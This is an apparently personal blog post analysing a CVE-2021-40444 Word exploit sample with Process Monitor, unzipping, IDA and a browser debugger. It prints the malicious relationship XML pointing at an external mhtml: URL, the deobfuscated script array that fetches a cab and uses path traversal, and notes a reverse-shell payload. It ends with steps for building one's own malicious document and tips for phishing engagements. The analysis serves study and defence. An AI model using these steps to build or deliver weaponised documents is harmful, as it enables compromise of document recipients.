I’m writing the blog post when I have no technical background on this exploit. So I would like to share my experience with it. I saw a lot of people did a proof of concept, so I decided to do something different which is I will get the exploit then I will analyze more and go deep into it, and if you noticed any mistake in my blogpost be DM me on my Twitter account.
I hope I can do something useful, enjoy reading.
Here is my test environment lab listed below:
- Windows System
- Process Monitor
- Microsoft Office
Process Monitor will help us to figure out what is happens when we open the affected word document.
Python3 will help us to start a SimpleHTTPServer, feel free to use whatever you want.
After setup the environment. I will download the exploit sample from https://github.com/rfcxv/CVE-2021-40444-POC
Thanks so much, @rfcxv and @JAMESWT_MHT for uploading the samples.
After Downloading the samples, I renamed the file’s name.
I would like to start with dynamic analyzes to figure out what is happens behind the scenes. So I will start the process monitor then CTRL+E and CTRL+X to stop capturing the events and clear the events.
Then I will set up a filter to capture the only Microsoft Word events by pressing CTRL+L then I will set WINWORD.exe in the filter then apply the changes.
Then let’s capture our word events by pressing CTRL+E again then open the word document.
Here I will do some Static analyzes. So I would like to start from the doc file. So let’s unpack the document
By changing the file extension to .zip then extract the file data.
Then when I went to check the file I noticed two weird URLs in the relationship file.
<?xml version="1.0" encoding="UTF-8" standalone="yes"?> <Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"> <Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="theme/theme1.xml" /> <Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/webSettings" Target="webSettings.xml" /> <Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/fontTable" Target="fontTable.xml" /> <Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/settings" Target="settings.xml" /> <Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml" /> <Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="mhtml:http://hidusi.com/e8c76295a5f9acb7/side.html!x-usc:http://hidusi.com/e8c76295a5f9acb7/side.html" TargetMode="External" /> <Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.wmf" /> <Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.jpeg" /> </Relationships>
Relationship files is the normal behavior should to contains internal/External resources such as (font, theme, and web settings, etc.)
I found two external URLs refers to hidusi.com domain.
MHTML is a file extension for a Web page archive file format as saved by Internet Explorer. The archived Web page is an MHTML document. MHTML saves the Web page content and incorporates external resources, such as images, applets, Flash animations and so on, into HTML documents.
So I decided to add that domain name in my hosts file and establish an HTTP server through python.
Now let’s see what will happen when I open the document again.
Okay, it goes to get the content of the side.html as I found in the relationship file. There is an ID for each relationship so I can take the ID of that relationship and search in the document.xml file to find more details on it.
And yeah I found OLEObject for that ID as expected.
Word OLE (Object Linking and Embedding) object is used to make contents, created in one program, available in Word document. For example, users can insert an Excel worksheet in a Word document.
Both Linked object and Embedded object can be used between Word and other programs.
When I took a look into the cab file through WinRAR I noticed an inf binary inside it and it looks like there is an LFI vulnerability because there is
..\ before the file name, but okay we’ll go deep in that later so now let’s find out what is the inf binary does.
I’ll use the file command but as we know that command is on Linux and I do not have bash or Linux subsystem on my machine but thanks so much @nscaife for this awesome work https://github.com/nscaife/file-windows/releases
After taking a look into that cab file in IDA I found the below:
- It creates a
CreateThreadto return a reverse shell to the attacker.
So my next step will be analysis that HTML file.
I found JS in the HTML but sadly it was obfuscated.
So I will dig more to figure out what is the goal of that JS. to do that mission I will need to do some dynamic debugging and again I can do this through vscode and I’ll select Edge for debugging because the HTML supports IE11.
When I look at the first array I noticed some things looks like it tries to send a GET request to fitch the cab file, but yeah let’s go deep.
I will set a breakpoint at this point
because I noticed it does some push and shift for the first array so I decided to discover more about it.
So all I’ll do is to set a breakpoint at this line then run my debugger on Edge. Then I will keep my eye on the array.
and yeah as expected it takes the first value in the array and pushes it again into it. So now if you noticed there is an if condition before modifies the array, I think this condition just to stop that push on a specific value, so I’ll change my breakpoint to the break function to check the array after that modification.
Fine, now our new array is
['#version=5,0,0,0', 'ssi', 'iframe', '748708rfmUTk', 'documentElement', 'lFile', 'location', '159708hBVRtu', 'a/Lo', 'Script', 'document', 'call', 'contentWindow', 'emp', 'Document', 'Obj', 'prototype', 'lfi', 'bject', 'send', 'appendChild', 'Low/championship.inf', 'htmlfile', '115924pLbIpw', 'GET', 'p/championship.inf', '1109sMoXXX', './../A', 'htm', 'l/T', 'cal/', '1wzQpCO', 'ect', 'w/championship.inf', '522415dmiRUA', 'http://127.0.0.1/test.cab', '88320wWglcB', 'XMLHttpRequest', 'championship.inf', 'Act', 'D:edbc374c-5730-432a-b5b8-de94f0b57217', 'open', '<bo', 'HTMLElement', '/..', 'veXO', '102FePAWC', '123', '365952KMsRQT', 'tiveX', '/Lo', './../../', 'contentDocument', 'ppD', 'Dat', 'close', 'Acti', 'removeChild', 'mlF', 'write', './A', 'ata/', 'ile', '../', 'body', 'setAttribute']
and if you want to count how many times it goes to else, simply you can make a flag variable with 0 value and add 1 when it goes into else and log it before the break.
and if you did that. you can find the count easily in the console section
Then I decided to take a fast look at all the variables, so basically I typed var in the search then I found 15 variables - 1 variable for our flag = 14 variables, so It didn’t take much time to notice the following:
- There are 3 variables with only one letter (_0x371a71, _0xd7e33d, _0x487bfa).
- There are some variables concat from the array and another variables.
So, now I decided to create a script that takes the obfuscate file then replaces these variables with them values, wait what!!!?
I’m too lazy right now, so I won’t do that now :joy:
All I will do is replace it with myself.
Dynamic Analyzes again
So now we know that HTML file will go and download the cab file.
Then let’s start our python HTTP server and see what will happen.
At the current moment, I do not know How is this file used?
So to get this answer let’s capture the word event and see what is happens in the background.
Here I’ll filter the inf binary to get where its use.
and yeah I found it running through rundll32.exe
WHAT WAIT A MINUTE !!!!!!!!!!!!
tbh idk why sometimes rundll32.exe can not find the championship.inf while if you went to the path you will find it :(
If we take a close look into any event of these we will found the full command line.
and if we went to C:\Users\PwnLab\AppData\Local\Temp that path we will found
I lost my power after all of I did and I want to publish this blogpost before go to sleep so I will do a few step on how to create your own malicious document.
- Download Office.
- Create a normal word document.
- Add Bitmap Image.
- unpack the document.
- modify the document.xml.rels, to add your external relationship.
- modify the document.xml, to add OLEObject with the same relationship ID.
- pack the document again.
- Create your own dll.
- Convert the dll to cab.
- Modify the HTML file to add your cab locations and inf file.
Note for Red Teamer
If you are planning to use this CVE in your phishing engagement take care because many solutions are checking the Relationship files and if it found any kind of external relationship, it will take that URL and open it to check if it has malicious data or not. So watch out :)
If you have feedback please go ahead and DM me on Twitter, See you in the next blogpost.